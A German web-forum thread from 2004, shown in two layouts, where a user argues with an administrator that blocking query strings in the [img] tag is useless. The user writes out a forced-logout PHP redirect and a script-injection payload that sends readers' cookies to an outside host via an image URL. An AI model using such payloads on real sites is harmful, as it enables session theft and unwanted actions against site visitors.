Problem mit dem [img]-Tag - Global-Talk

System · 13.07.2004, 14:33

ja, also der image tag ist im moment ziemlich kaputt, wenn man da einen img link mit einem ? benutzt so wie andreas da, wird das bild einfach nicht angezeigt. gut find ich das nicht

*tdd* · 14.07.2004, 17:13

Hi
@System, hab den beitrag mal hierher verschoben, da es hier besser reinpasst.

Es hat einen grund, weshalb es probleme mit dem "?" gibt. Man könnte sonst php befehle mit dem img-tag ausführen und niemand kann sich dagegen schützen.

System · 14.07.2004, 18:39

naja, ich kann einfach ein script schreiben, dass dann folgendes macht:
auftag?php header("Location: http://80.190.243.221/login.php?do=logout"); ?zutag

wenn ich dieses php script bei image tag hier einlinke, was im moment erlaubt ist und auch nicht gesperrt werden kann (ich kann scripte auch script.jpg nennen, meinem apache ist das ega, wenn das verzeichnis stimmtl), dann würde jeder leser des beitrages sofort abgemeldet werden. da es so geht, kann man das ? auch direkt erlauben.

System · 14.07.2004, 18:45

und da fällt mir auf, was ist mit folgendem trick:
<script>document.write('<img src=http://pfuscher.funpic.de/formular.php?"'+encodeURI(document.cookie)+'">')</script>

das bild wird erzeugt durch

Zitat:

script document.write('img src=http://pfuscher.funpic.de/formular.php?"'+encodeURI(document.cookie)+'"') /script

allerdings mit entsprechnen dreieckigen klammern dazu, doch leider kann man die hier nicht schreiben, ohne dass sie als html interpretiert werden und ich bin zu faul nachzusehen, wie die entities lauten

es geht natürlich auch als text:
<script>document.write(document.cookie)</script>

*tdd* · 14.07.2004, 19:17

Ähm, ja,
der img tag ist eh nicht so ganz perfekt. Aber noch mehr lücken müssen ja auch nicht rein, oder?

System · 14.07.2004, 20:41

man baut nicht mehr lücken damit ein, sondern man blockiert nur eine bestimmte funktionalität, nämlich querystrings bei urls, die negative und positiven nutzen haben können. jedoch wird die negative nutzung nicht verhinder, da man mit einfachen tricks ja doch wieder alles kann. wer will hier überhaupt für jemand anders php sache ausführen? da würde man doch eh nur gebannt werden

13.07.2004, 14:33	#1
System Schlächter Registriert seit: 07.05.2004 Beiträge: 382	AW: Polizeikräfte, Einsatztaktik und Krawalle ja, also der image tag ist im moment ziemlich kaputt, wenn man da einen img link mit einem ? benutzt so wie andreas da, wird das bild einfach nicht angezeigt. gut find ich das nicht __________________

14.07.2004, 17:13	#2
tdd Administrator Registriert seit: 26.11.2003 Ort: Wolfsburg Beiträge: 687	AW: Problem mit dem [img]-Tag Hi @System, hab den beitrag mal hierher verschoben, da es hier besser reinpasst. Es hat einen grund, weshalb es probleme mit dem "?" gibt. Man könnte sonst php befehle mit dem img-tag ausführen und niemand kann sich dagegen schützen. __________________ mfg tdd

14.07.2004, 18:39	#3
System Schlächter Registriert seit: 07.05.2004 Beiträge: 382	AW: Problem mit dem [img]-Tag naja, ich kann einfach ein script schreiben, dass dann folgendes macht: auftag?php header("Location: http://80.190.243.221/login.php?do=logout"); ?zutag wenn ich dieses php script bei image tag hier einlinke, was im moment erlaubt ist und auch nicht gesperrt werden kann (ich kann scripte auch script.jpg nennen, meinem apache ist das ega, wenn das verzeichnis stimmtl), dann würde jeder leser des beitrages sofort abgemeldet werden. da es so geht, kann man das ? auch direkt erlauben. __________________ Geändert von System (14.07.2004 um 19:05 Uhr).

14.07.2004, 18:45	#4
System Schlächter Registriert seit: 07.05.2004 Beiträge: 382	AW: Problem mit dem [img]-Tag und da fällt mir auf, was ist mit folgendem trick: <script>document.write('<img src=http://pfuscher.funpic.de/formular.php?"'+encodeURI(document.cookie)+'">')</script> das bild wird erzeugt durch Zitat: script document.write('img src=http://pfuscher.funpic.de/formular.php?"'+encodeURI(document.cookie)+'"') /script allerdings mit entsprechnen dreieckigen klammern dazu, doch leider kann man die hier nicht schreiben, ohne dass sie als html interpretiert werden und ich bin zu faul nachzusehen, wie die entities lauten es geht natürlich auch als text: <script>document.write(document.cookie)</script> __________________ Geändert von System (14.07.2004 um 19:13 Uhr).

14.07.2004, 19:17	#5
tdd Administrator Registriert seit: 26.11.2003 Ort: Wolfsburg Beiträge: 687	AW: Problem mit dem [img]-Tag Ähm, ja, der img tag ist eh nicht so ganz perfekt. Aber noch mehr lücken müssen ja auch nicht rein, oder? __________________ mfg tdd

14.07.2004, 20:41	#6
System Schlächter Registriert seit: 07.05.2004 Beiträge: 382	AW: Problem mit dem [img]-Tag man baut nicht mehr lücken damit ein, sondern man blockiert nur eine bestimmte funktionalität, nämlich querystrings bei urls, die negative und positiven nutzen haben können. jedoch wird die negative nutzung nicht verhinder, da man mit einfachen tricks ja doch wieder alles kann. wer will hier überhaupt für jemand anders php sache ausführen? da würde man doch eh nur gebannt werden __________________

Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)

Themen-Optionen
Druckbare Version zeigen Diese Seite per E-Mail verschicken
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln